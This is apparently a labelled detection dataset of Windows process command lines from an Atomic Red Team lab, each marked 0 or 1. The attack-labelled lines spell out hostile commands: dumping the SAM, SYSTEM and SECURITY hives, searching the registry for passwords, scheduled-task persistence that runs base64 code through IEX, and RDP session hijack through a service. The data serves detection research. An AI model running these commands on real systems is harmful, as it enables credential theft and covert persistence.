WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA==
0
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbABlAGEAbgB1AHAA cmd.exe "cmd.exe" /c "for /L %%a in (1,1,10) do @(del %%temp%%\SAMvss%%a >nul 2>&1)"
0
cmd.exe "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\atomics\..\ExternalPayloads\nircmd.exe win child class Shell_TrayWnd hide class TrayClockWClass powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\cmd.exe btool.exe "C:\Program Files\SplunkUniversalForwarder\bin\btool.exe" server list watchdog --no-log
0
cmd.exe unknown C:\Windows\System32\cmd.exe /c "reg save HKLM\sam %temp%\sam & reg save HKLM\system %temp%\system & reg save HKLM\security %temp%\security" powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ar-win-2.attackrange.local Administrator
1
ar-win-2.attackrange.local Administrator "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\so111rqw\so111rqw.cmdline" cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES3862.tmp" "c:\Users\Administrator\AppData\Local\Temp\so111rqw\CSC6C6AE78E35B9407DA633A871C9C424.TMP"
0
cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme" splunkd.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
reg.exe reg save HKLM\security C:\Users\ADMINI~1\AppData\Local\Temp\security "cmd.exe" /c "reg save HKLM\sam %temp%\sam & reg save HKLM\system %temp%\system & reg save HKLM\security %temp%\security" ar-win-2.attackrange.local Administrator
1
cmd.exe C:\Windows\System32\cmd.exe /c "net.exe stop spooler" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "mkdir %temp%\T1222.001_attrib & echo T1222.001_attrib1 >> %temp%\T1222.001_attrib\T1222.001_attrib1.txt & echo T1222.001_attrib2 >> %temp%\T1222.001_attrib\T1222.001_attrib2.txt & attrib.exe +r %temp%\T1222.001_attrib\T1222.001_attrib1.txt & attrib.exe +r %temp%\T1222.001_attrib\T1222.001_attrib2.txt" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe chcp.com "C:\Windows\system32\chcp.com" 65001
0
cmd.exe "cmd.exe" /c "reg query HKLM /f password /t REG_SZ /s & reg query HKCU /f password /t REG_SZ /s" powershell.exe ar-win-2.attackrange.local
1
cmd.exe "cmd.exe" /c "reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f & schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st 07:45" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe "cmd.exe" /c "sc.exe create AtomicService binPath= "C:\Windows\System32\calc.exe" & sc sdset AtomicService "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path \""C:\AtomicRedTeam\atomics\..\ExternalPayloads\PowerDump.ps1\"") {exit 0} else {exit 1}}
0
ar-win-2.attackrange.local Administrator "powershell.exe" & {} HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local Administrator "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\d01zol5d\d01zol5d.cmdline" cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESD80D.tmp" "c:\Users\Administrator\AppData\Local\Temp\d01zol5d\CSCE257E7E2116D4FB7834BC256C88DF52.TMP"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe rundll32.exe "C:\Windows\system32\rundll32.exe" Windows.Storage.ApplicationData.dll,CleanupTemporaryState
0
cmd.exe C:\Windows\system32\cmd.exe /c btool server list sslConfig --no-log splunk.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\iqg5l5hb\iqg5l5hb.cmdline" cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESD3C7.tmp" "c:\Users\Administrator\AppData\Local\Temp\iqg5l5hb\CSC9E169E65B05B4E51B224626AAB45EE88.TMP"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\taskhostw.exe ngentask.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe" /RuntimeWide /StopEvent:1224
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe chcp.com "C:\Windows\system32\chcp.com" 65001
0
sc.exe C:\Windows\System32\sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55" cmd.exe ar-win-2.attackrange.local Administrator
1
cmd.exe C:\Windows\System32\cmd.exe /c "del "%TEMP%\test.bin" >nul 2>&1" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe btool.exe "C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"
0
reg.exe reg save HKLM\system C:\Users\ADMINI~1\AppData\Local\Temp\system "cmd.exe" /c "reg save HKLM\sam %temp%\sam & reg save HKLM\system %temp%\system & reg save HKLM\security %temp%\security" ar-win-dc.attackrange.local Administrator
1
ar-win-2.attackrange.local Administrator "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\aob4sqd3.cmdline"
0
net1.exe net1.exe C:\Windows\system32\net1 stop spooler net.exe net.exe stop spooler ar-win-dc.attackrange.local Administrator
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe CompatTelRunner.exe "C:\Windows\system32\compattelrunner.exe"
0
cmd.exe C:\Windows\System32\cmd.exe /c "echo "Hello from the Windows Command Prompt!" > "%TEMP%\test.bin" & type "%TEMP%\test.bin"" powershell.exe ar-win-2.attackrange.local
1